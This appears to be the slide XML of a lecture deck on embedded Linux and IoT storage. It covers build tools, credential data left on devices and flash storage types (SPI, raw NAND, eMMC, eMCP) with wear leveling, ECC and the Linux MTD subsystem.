            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>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openembedded</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crosstool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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crossdev</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There are many flavors of Linux used in embedded: full linux OS (like Ubuntu), special embedded OS (like OpenWRT or Yocto).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{423AFBE0-126F-C446-BD56-DDFB8A4D4B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="925194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12DA72-8626-4498-82D7-0D6FD3FDAA4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180109" y="180065"/>
            <a:ext cx="11762506" cy="879477"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Interlude: the dark world of IoT device storage</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="4000" b="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1805939B-79A8-4A8B-9D8F-B7D68C727B26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540324" y="1697292"/>
            <a:ext cx="11402291" cy="4747530"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data on individual devices depends on device type but yields all kinds of information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wi-Fi credentials, Cloud credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The more performance/functions/storage a device has, the more data is available on it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Phones store a whole lot of sensitive information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pictures, Messages, Account credentials, call lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Device storages were not encrypted by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Introduced with iOS 8 (2014), Android 6.0 (2015)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Factory reset does not wiping all the data (Yikes!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Paper “Security analysis of android factory resets” (2015.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Addressed with new NIST SP 800-88 Rev. 1 (2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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E63F95-A1D3-8B47-90EB-B276A42668C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="341211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64D3B0-A077-4EE1-8CE6-4A8FB3304347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659824" y="34694"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Storage on IoT devices</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" b="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3582BC8D-0886-4E45-98E5-E3ECAC6526F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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Two groups of storage types:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Raw flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Serial flash (SPI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NAND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(NOR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Parallel NAND flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Block devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eMMC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eMCP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(SD cards)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Choice of storage type affects useable filesystems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37369A0E-0246-4AB2-B33B-0F1C0F1E0F7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9414" y="1381309"/>
            <a:ext cx="6205832" cy="2829285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42C53BD2-26F7-4282-8B75-6A6D6E94124B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5769429" y="2625634"/>
            <a:ext cx="966651" cy="19115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en-US" dirty="0"/>
              <a:t>SPI</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{297CCFD9-77E2-48D2-8A24-4C77E41B8112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6838951" y="1476103"/>
            <a:ext cx="1786890" cy="3069772"/>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b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Raw NAND</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4E99F92-E675-4088-88B2-25865858B954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8843556" y="1381309"/>
            <a:ext cx="1389016" cy="3843834"/>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en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eMMC</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9820EC70-398B-4B92-ACB5-96B8DD2350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68069" y="1564036"/>
            <a:ext cx="634455" cy="481979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F0BED43-96F2-4F05-AA50-67F9F42AB9F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10302242" y="1381308"/>
            <a:ext cx="1653652" cy="3843835"/>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en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eMCP</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{339E69CE-9733-4BD3-AE99-BDA0CC49060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52857" y="4187347"/>
            <a:ext cx="675891" cy="651814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{155CF47D-1BD9-4C7C-ABF4-32E751DB083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03728" y="3010989"/>
            <a:ext cx="952166" cy="1879232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED82CFFD-8B2B-C24E-9623-9FA0D130057A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3114930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AC04F-5D6E-4101-8332-7BBEF26C9974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711708" y="75286"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Raw NAND flash</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" b="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D431410C-2623-4010-B5F6-E4092C28132C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="568035" y="1524006"/>
            <a:ext cx="10972800" cy="5095588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SPI flash: typically sizes &lt; 64MByte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Packages: SOP8, WSON8,…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Raw NAND: typically 128MByte – 4GByte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Require host controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Packages: TSOP-48, TSOP-56, BGA-63 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cheap and fast storage, but bit-errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host controller/OS tasks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wear leveling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ECC  (sometimes CPU accelerated)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bad-Block management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Abstraction under Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MTD subsystem (Memory Technology Devices)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Character device -&gt; Block device</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE"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E16AC74-4C0E-4558-B92B-18CF6FCD2EEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8981753" y="1627633"/>
            <a:ext cx="3121152" cy="1956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Rounded Corners 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B24542E6-02C6-4510-A523-C69ED779B863}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9164633" y="1737518"/>
            <a:ext cx="2810256" cy="10610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NAND flash</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C08CA07D-F520-4987-B258-AFDE0DA78F88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8981753" y="4279392"/>
            <a:ext cx="3121152" cy="18467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Host processor</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle: Rounded Corners 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{435AAE1E-B298-4AFF-8398-B02458F3E1CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9057953" y="4974335"/>
            <a:ext cx="2916936" cy="104851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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wear leveling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ECC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
